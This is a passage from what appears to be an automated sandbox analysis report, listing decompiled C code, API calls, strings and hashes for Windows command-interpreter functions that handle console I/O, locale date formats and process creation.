                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3892
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F38DA
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F38E1
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 011F390A
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F3911
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3938
                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3949
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3952
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                    • API String ID: 2991647268-3100821235
                                                    • Opcode ID: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                                    • Instruction ID: 45fd8c7e27964852de64885f15b11fef0f8a65f405dab691c5ca65f65186337c
                                                    • Opcode Fuzzy Hash: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                                    • Instruction Fuzzy Hash: 53C1D671614301AFDB28DF68E89CA6B7BE5FF98714F04492DFA66C2294DB31C581CB12
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E011E3F80() {
				signed int _v8;
				short _v264;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				void* _t92;
				short* _t93;
				short* _t94;
				short* _t95;
				short* _t96;
				short* _t97;
				short* _t98;
				short* _t99;
				short* _t100;
				short* _t101;
				short* _t102;
				short* _t103;
				intOrPtr* _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				int _t111;
				int _t112;
				int _t113;
				int _t114;
				int _t115;
				int _t116;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t130;
				void* _t132;
				void* _t134;
				int _t136;
				signed int _t138;

				_t33 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t33 ^ _t138;
				_t136 = E011E41A4();
				if(GetLocaleInfoW(_t136, 0x1e, 0x11ff81c, 8) == 0) {
					_t93 = 0x11ff81c;
					_t107 = 8;
					_t118 = ":" - 0x11ff81c;
					while(1) {
						_t11 = _t107 + 0x7ffffff6; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t91 =  *(_t118 + _t93) & 0x0000ffff;
						if(_t91 == 0) {
							break;
						}
						 *_t93 = _t91;
						_t93 =  &(_t93[1]);
						_t107 = _t107 - 1;
						if(_t107 != 0) {
							continue;
						}
						L33:
						_t93 = _t93 - 2;
						L34:
						 *_t93 = 0;
						goto L1;
					}
					if(_t107 != 0) {
						goto L34;
					}
					goto L33;
				}
				L1:
				if(GetLocaleInfoW(_t136, 0x23,  &_v264, 0x80) == 0) {
					L9:
					 *0x11fd540 = 0;
					if(GetLocaleInfoW(_t136, 0x21,  &_v264, 0x80) != 0) {
						_t86 = (_v264 & 0x0000ffff) - 0x30;
						if(_t86 != 0) {
							_t87 = _t86 - 1;
							if(_t87 == 0) {
								 *0x11fd540 = 1;
								 *0x11ff7f8 = L"dd/MM/yy";
							} else {
								if(_t87 == 1) {
									 *0x11fd540 = 2;
									 *0x11ff7f8 = L"yy/MM/dd";
								}
							}
						} else {
							 *0x11fd540 = _t86;
							 *0x11ff7f8 = L"MM/dd/yy";
						}
					}
					 *0x11ff620 = 2;
					if(GetLocaleInfoW(_t136, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x11ff620 = 4;
					}
					if(GetLocaleInfoW(_t136, 0x1d, 0x11ff80c, 8) == 0) {
						_t94 = 0x11ff80c;
						_t108 = 8;
						_t120 = "/" - 0x11ff80c;
						while(1) {
							_t13 = _t108 + 0x7ffffff6; // 0x7ffffffe
							if(_t13 == 0) {
								break;
							}
							_t84 =  *(_t120 + _t94) & 0x0000ffff;
							if(_t84 == 0) {
								break;
							}
							 *_t94 = _t84;
							_t94 =  &(_t94[1]);
							_t108 = _t108 - 1;
							if(_t108 != 0) {
								continue;
							}
							L45:
							_t94 = _t94 - 2;
							L46:
							 *_t94 = 0;
							goto L16;
						}
						if(_t108 != 0) {
							goto L46;
						}
						goto L45;
					} else {
						L16:
						if(GetLocaleInfoW(_t136, 0x31, 0x11ff7a8, 0x20) == 0) {
							_t95 = 0x11ff7a8;
							_t109 = 0x20;
							_t122 = L"Mon" - 0x11ff7a8;
							while(1) {
								_t15 = _t109 + 0x7fffffde; // 0x7ffffffe
								if(_t15 == 0) {
									break;
								}
								_t83 =  *(_t122 + _t95) & 0x0000ffff;
								if(_t83 == 0) {
									break;
								}
								 *_t95 = _t83;
								_t95 =  &(_t95[1]);
								_t109 = _t109 - 1;
								if(_t109 != 0) {
									continue;
								}
								L53:
								_t95 = _t95 - 2;
								L54:
								 *_t95 = 0;
								goto L17;
							}
							if(_t109 != 0) {
								goto L54;
							}
							goto L53;
						}
						L17:
						if(GetLocaleInfoW(_t136, 0x32, 0x11ff768, 0x20) == 0) {
							_t96 = 0x11ff768;
							_t110 = 0x20;
							_t124 = L"Tue" - 0x11ff768;
							while(1) {
								_t17 = _t110 + 0x7fffffde; // 0x7ffffffe
								if(_t17 == 0) {
									break;
								}
								_t82 =  *(_t124 + _t96) & 0x0000ffff;
								if(_t82 == 0) {
									break;
								}
								 *_t96 = _t82;
								_t96 =  &(_t96[1]);
								_t110 = _t110 - 1;
								if(_t110 != 0) {
									continue;
								}
								L61:
								_t96 = _t96 - 2;
								L62:
								 *_t96 = 0;
								goto L18;
							}
							if(_t110 != 0) {
								goto L62;
							}
							goto L61;
						}
						L18:
						if(GetLocaleInfoW(_t136, 0x33, 0x11ff728, 0x20) == 0) {
							_t97 = 0x11ff728;
							_t111 = 0x20;
							_t126 = L"Wed" - 0x11ff728;
							while(1) {
								_t19 = _t111 + 0x7fffffde; // 0x7ffffffe
								if(_t19 == 0) {
									break;
								}
								_t81 =  *(_t126 + _t97) & 0x0000ffff;
								if(_t81 == 0) {
									break;
								}
								 *_t97 = _t81;
								_t97 =  &(_t97[1]);
								_t111 = _t111 - 1;
								if(_t111 != 0) {
									continue;
								}
								L69:
								_t97 = _t97 - 2;
								L70:
								 *_t97 = 0;
								goto L19;
							}
							if(_t111 != 0) {
								goto L70;
							}
							goto L69;
						}
						L19:
						if(GetLocaleInfoW(_t136, 0x34, 0x11ff6e8, 0x20) == 0) {
							_t98 = 0x11ff6e8;
							_t112 = 0x20;
							_t128 = L"Thu" - 0x11ff6e8;
							while(1) {
								_t21 = _t112 + 0x7fffffde; // 0x7ffffffe
								if(_t21 == 0) {
									break;
								}
								_t80 =  *(_t128 + _t98) & 0x0000ffff;
								if(_t80 == 0) {
									break;
								}
								 *_t98 = _t80;
								_t98 =  &(_t98[1]);
								_t112 = _t112 - 1;
								if(_t112 != 0) {
									continue;
								}
								L77:
								_t98 = _t98 - 2;
								L78:
								 *_t98 = 0;
								goto L20;
							}
							if(_t112 != 0) {
								goto L78;
							}
							goto L77;
						}
						L20:
						if(GetLocaleInfoW(_t136, 0x35, 0x11ff6a8, 0x20) == 0) {
							_t99 = 0x11ff6a8;
							_t113 = 0x20;
							_t130 = L"Fri" - 0x11ff6a8;
							while(1) {
								_t23 = _t113 + 0x7fffffde; // 0x7ffffffe
								if(_t23 == 0) {
									break;
								}
								_t79 =  *(_t130 + _t99) & 0x0000ffff;
								if(_t79 == 0) {
									break;
								}
								 *_t99 = _t79;
								_t99 =  &(_t99[1]);
								_t113 = _t113 - 1;
								if(_t113 != 0) {
									continue;
								}
								L85:
								_t99 = _t99 - 2;
								L86:
								 *_t99 = 0;
								goto L21;
							}
							if(_t113 != 0) {
								goto L86;
							}
							goto L85;
						}
						L21:
						if(GetLocaleInfoW(_t136, 0x36, 0x11ff668, 0x20) == 0) {
							_t100 = 0x11ff668;
							_t114 = 0x20;
							_t132 = L"Sat" - 0x11ff668;
							while(1) {
								_t25 = _t114 + 0x7fffffde; // 0x7ffffffe
								if(_t25 == 0) {
									break;
								}
								_t78 =  *(_t132 + _t100) & 0x0000ffff;
								if(_t78 == 0) {
									break;
								}
								 *_t100 = _t78;
								_t100 =  &(_t100[1]);
								_t114 = _t114 - 1;
								if(_t114 != 0) {
									continue;
								}
								L93:
								_t100 = _t100 - 2;
								L94:
								 *_t100 = 0;
								goto L22;
							}
							if(_t114 != 0) {
								goto L94;
							}
							goto L93;
						}
						L22:
						if(GetLocaleInfoW(_t136, 0x37, 0x11ff628, 0x20) == 0) {
							_t101 = 0x11ff628;
							_t115 = 0x20;
							_t134 = L"Sun" - 0x11ff628;
							while(1) {
								_t27 = _t115 + 0x7fffffde; // 0x7ffffffe
								if(_t27 == 0) {
									break;
								}
								_t77 =  *(_t134 + _t101) & 0x0000ffff;
								if(_t77 == 0) {
									break;
								}
								 *_t101 = _t77;
								_t101 =  &(_t101[1]);
								_t115 = _t115 - 1;
								if(_t115 != 0) {
									continue;
								}
								L101:
								_t101 = _t101 - 2;
								L102:
								 *_t101 = 0;
								goto L23;
							}
							if(_t115 != 0) {
								goto L102;
							}
							goto L101;
						}
						L23:
						if(GetLocaleInfoW(_t136, 0xe, 0x11ff7fc, 8) == 0) {
							_t102 = 0x11ff7fc;
							_t116 = 8;
							_t134 = "." - 0x11ff7fc;
							while(1) {
								_t29 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t29 == 0) {
									break;
								}
								_t76 =  *(_t134 + _t102) & 0x0000ffff;
								if(_t76 == 0) {
									break;
								}
								 *_t102 = _t76;
								_t102 =  &(_t102[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L109:
								_t102 = _t102 - 2;
								L110:
								 *_t102 = 0;
								goto L24;
							}
							if(_t116 != 0) {
								goto L110;
							}
							goto L109;
						}
						L24:
						if(GetLocaleInfoW(_t136, 0xf, 0x11ff7e8, 8) == 0) {
							_t103 = 0x11ff7e8;
							_t116 = 8;
							_t136 = "," - 0x11ff7e8;
							while(1) {
								_t31 = _t116 + 0x7ffffff6; // 0x7ffffffe
								if(_t31 == 0) {
									break;
								}
								_t75 =  *(_t103 + _t136) & 0x0000ffff;
								if(_t75 == 0) {
									break;
								}
								 *_t103 = _t75;
								_t103 =  &(_t103[1]);
								_t116 = _t116 - 1;
								if(_t116 != 0) {
									continue;
								}
								L117:
								_t103 = _t103 - 2;
								L118:
								 *_t103 = 0;
								goto L25;
							}
							if(_t116 != 0) {
								goto L118;
							}
							goto L117;
						}
						L25:
						__imp__setlocale(".OCP");
						return E011E6FD0(0, _t92, _v8 ^ _t138, _t116, _t134, _t136, 0);
					}
				} else {
					_t89 = "1";
					_t106 =  &_v264;
					while(1) {
						_t116 =  *_t106;
						if(_t116 !=  *_t89) {
							break;
						}
						if(_t116 == 0) {
							L7:
							_t90 = 0;
							L8:
							 *0x11fd0cc = _t90;
							goto L9;
						}
						_t116 =  *((intOrPtr*)(_t106 + 2));
						_t5 = _t89 + 2; // 0x410000
						if(_t116 !=  *_t5) {
							break;
						}
						_t106 = _t106 + 4;
						_t89 = _t89 + 4;
						if(_t116 != 0) {
							continue;
						}
						goto L7;
					}
					asm("sbb eax, eax");
					_t90 = _t89 | 0x00000001;
					goto L8;
				}
			}

























































                                                    0x011e3f8b
                                                    0x011e3f92
                                                    0x011e3fa3
                                                    0x011e3fb0
                                                    0x011ee1fa
                                                    0x011ee204
                                                    0x011ee209
                                                    0x011ee20b
                                                    0x011ee20b
                                                    0x011ee213
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee215
                                                    0x011ee21c
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee21e
                                                    0x011ee221
                                                    0x011ee224
                                                    0x011ee227
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee22f
                                                    0x011ee22f
                                                    0x011ee232
                                                    0x011ee234
                                                    0x00000000
                                                    0x011ee234
                                                    0x011ee22d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee22d
                                                    0x011e3fb6
                                                    0x011e3fcd
                                                    0x011e4011
                                                    0x011e401c
                                                    0x011e4032
                                                    0x011e403b
                                                    0x011e403e
                                                    0x011ee23c
                                                    0x011ee23f
                                                    0x011ee263
                                                    0x011ee26d
                                                    0x011ee241
                                                    0x011ee244
                                                    0x011ee24a
                                                    0x011ee254
                                                    0x011ee254
                                                    0x011ee244
                                                    0x011e4044
                                                    0x011e4044
                                                    0x011e4049
                                                    0x011e4049
                                                    0x011e403e
                                                    0x011e405e
                                                    0x011e4074
                                                    0x011e4080
                                                    0x011e4080
                                                    0x011e409c
                                                    0x011ee27c
                                                    0x011ee286
                                                    0x011ee28b
                                                    0x011ee28d
                                                    0x011ee28d
                                                    0x011ee295
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee297
                                                    0x011ee29e
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2a0
                                                    0x011ee2a3
                                                    0x011ee2a6
                                                    0x011ee2a9
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2b1
                                                    0x011ee2b1
                                                    0x011ee2b4
                                                    0x011ee2b6
                                                    0x00000000
                                                    0x011ee2b6
                                                    0x011ee2af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e40a2
                                                    0x011e40a2
                                                    0x011e40b4
                                                    0x011ee2be
                                                    0x011ee2c8
                                                    0x011ee2cd
                                                    0x011ee2cf
                                                    0x011ee2cf
                                                    0x011ee2d7
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2d9
                                                    0x011ee2e0
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2e2
                                                    0x011ee2e5
                                                    0x011ee2e8
                                                    0x011ee2eb
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2f3
                                                    0x011ee2f3
                                                    0x011ee2f6
                                                    0x011ee2f8
                                                    0x00000000
                                                    0x011ee2f8
                                                    0x011ee2f1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee2f1
                                                    0x011e40ba
                                                    0x011e40cc
                                                    0x011ee300
                                                    0x011ee30a
                                                    0x011ee30f
                                                    0x011ee311
                                                    0x011ee311
                                                    0x011ee319
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee31b
                                                    0x011ee322
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee324
                                                    0x011ee327
                                                    0x011ee32a
                                                    0x011ee32d
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee335
                                                    0x011ee335
                                                    0x011ee338
                                                    0x011ee33a
                                                    0x00000000
                                                    0x011ee33a
                                                    0x011ee333
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee333
                                                    0x011e40d2
                                                    0x011e40e4
                                                    0x011ee342
                                                    0x011ee34c
                                                    0x011ee351
                                                    0x011ee353
                                                    0x011ee353
                                                    0x011ee35b
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee35d
                                                    0x011ee364
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee366
                                                    0x011ee369
                                                    0x011ee36c
                                                    0x011ee36f
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee377
                                                    0x011ee377
                                                    0x011ee37a
                                                    0x011ee37c
                                                    0x00000000
                                                    0x011ee37c
                                                    0x011ee375
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee375
                                                    0x011e40ea
                                                    0x011e40fc
                                                    0x011ee384
                                                    0x011ee38e
                                                    0x011ee393
                                                    0x011ee395
                                                    0x011ee395
                                                    0x011ee39d
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee39f
                                                    0x011ee3a6
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3a8
                                                    0x011ee3ab
                                                    0x011ee3ae
                                                    0x011ee3b1
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3b9
                                                    0x011ee3b9
                                                    0x011ee3bc
                                                    0x011ee3be
                                                    0x00000000
                                                    0x011ee3be
                                                    0x011ee3b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3b7
                                                    0x011e4102
                                                    0x011e4114
                                                    0x011ee3c6
                                                    0x011ee3d0
                                                    0x011ee3d5
                                                    0x011ee3d7
                                                    0x011ee3d7
                                                    0x011ee3df
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3e1
                                                    0x011ee3e8
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3ea
                                                    0x011ee3ed
                                                    0x011ee3f0
                                                    0x011ee3f3
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3fb
                                                    0x011ee3fb
                                                    0x011ee3fe
                                                    0x011ee400
                                                    0x00000000
                                                    0x011ee400
                                                    0x011ee3f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee3f9
                                                    0x011e411a
                                                    0x011e412c
                                                    0x011ee408
                                                    0x011ee412
                                                    0x011ee417
                                                    0x011ee419
                                                    0x011ee419
                                                    0x011ee421
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee423
                                                    0x011ee42a
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee42c
                                                    0x011ee42f
                                                    0x011ee432
                                                    0x011ee435
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee43d
                                                    0x011ee43d
                                                    0x011ee440
                                                    0x011ee442
                                                    0x00000000
                                                    0x011ee442
                                                    0x011ee43b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee43b
                                                    0x011e4132
                                                    0x011e4144
                                                    0x011ee44a
                                                    0x011ee454
                                                    0x011ee459
                                                    0x011ee45b
                                                    0x011ee45b
                                                    0x011ee463
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee465
                                                    0x011ee46c
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee46e
                                                    0x011ee471
                                                    0x011ee474
                                                    0x011ee477
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee47f
                                                    0x011ee47f
                                                    0x011ee482
                                                    0x011ee484
                                                    0x00000000
                                                    0x011ee484
                                                    0x011ee47d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee47d
                                                    0x011e414a
                                                    0x011e415c
                                                    0x011ee48c
                                                    0x011ee496
                                                    0x011ee49b
                                                    0x011ee49d
                                                    0x011ee49d
                                                    0x011ee4a5
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4a7
                                                    0x011ee4ae
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4b0
                                                    0x011ee4b3
                                                    0x011ee4b6
                                                    0x011ee4b9
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4c1
                                                    0x011ee4c1
                                                    0x011ee4c4
                                                    0x011ee4c6
                                                    0x00000000
                                                    0x011ee4c6
                                                    0x011ee4bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4bf
                                                    0x011e4162
                                                    0x011e4174
                                                    0x011ee4ce
                                                    0x011ee4d8
                                                    0x011ee4dd
                                                    0x011ee4df
                                                    0x011ee4df
                                                    0x011ee4e7
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4e9
                                                    0x011ee4f0
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee4f2
                                                    0x011ee4f5
                                                    0x011ee4f8
                                                    0x011ee4fb
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee503
                                                    0x011ee503
                                                    0x011ee506
                                                    0x011ee508
                                                    0x00000000
                                                    0x011ee508
                                                    0x011ee501
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee501
                                                    0x011e417a
                                                    0x011e4181
                                                    0x011e4199
                                                    0x011e4199
                                                    0x011e3fcf
                                                    0x011e3fcf
                                                    0x011e3fd4
                                                    0x011e3fe0
                                                    0x011e3fe0
                                                    0x011e3fe6
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3fef
                                                    0x011e400a
                                                    0x011e400a
                                                    0x011e400c
                                                    0x011e400c
                                                    0x00000000
                                                    0x011e400c
                                                    0x011e3ff1
                                                    0x011e3ff5
                                                    0x011e3ff9
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3fff
                                                    0x011e4002
                                                    0x011e4008
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e4008
                                                    0x011e419a
                                                    0x011e419c
                                                    0x00000000
                                                    0x011e419c

                                                    APIs
                                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,011FF81C,00000008,00000000,?), ref: 011E3FA8
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 011E3FC5
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 011E402A
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 011E406C
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,011FF80C,00000008), ref: 011E4094
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,011FF7A8,00000020), ref: 011E40AC
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,011FF768,00000020), ref: 011E40C4
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,011FF728,00000020), ref: 011E40DC
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,011FF6E8,00000020), ref: 011E40F4
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,011FF6A8,00000020), ref: 011E410C
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,011FF668,00000020), ref: 011E4124
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,011FF628,00000020), ref: 011E413C
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,011FF7FC,00000008), ref: 011E4154
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,011FF7E8,00000008), ref: 011E416C
                                                    • setlocale.MSVCRT ref: 011E4181
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InfoLocale$DefaultUsersetlocale
                                                    • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                    • API String ID: 1351325837-478706884
                                                    • Opcode ID: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                                    • Instruction ID: 01d5c50c34bf41494f6a64a8ceedfd0b5577f7e0b08e51f19e1b576177d46185
                                                    • Opcode Fuzzy Hash: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                                    • Instruction Fuzzy Hash: 39D12675702A029AEB3D8EB8890C7763AE5FF51644F14822DE612DA5C8EBB0C646C356
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322threadprocessstringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011E374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E011E75CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x11fbdf8, 0x108);
				if(_t68 == 0) {
					 *0x1213cf0 = GetLastError();
					E011F5011(_t135);
					L21:
					return E011E7614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x1213cf0 = GetLastError();
					E011F5011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E011E3320(L"COPYCMD") == 0) {
					}
					_t90 = E011DDF40(0x11d24ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x11fd0b4);
						L011E82BB();
						L36:
						goto L21;
					}
					if( *0x1213ccc == 0) {
						__eflags =  *0x1218058;
						if( *0x1218058 != 0) {
							goto L6;
						}
						__eflags =  *0x1213cc4;
						if( *0x1213cc4 == 0) {
							L8:
							E011E4C00();
							_t94 =  *0x1213cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x1213cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x1213ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x1213cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E011E3A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x1213cc9;
									if( *0x1213cc9 == 0) {
										L48:
										__eflags =  *0x1213cf0 - 0x2e4;
										if( *0x1213cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E011E00B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E011E1040(_t177, 0x7fe7, _t135);
												E011F5011(_t177);
												E011E0040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E011E7797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
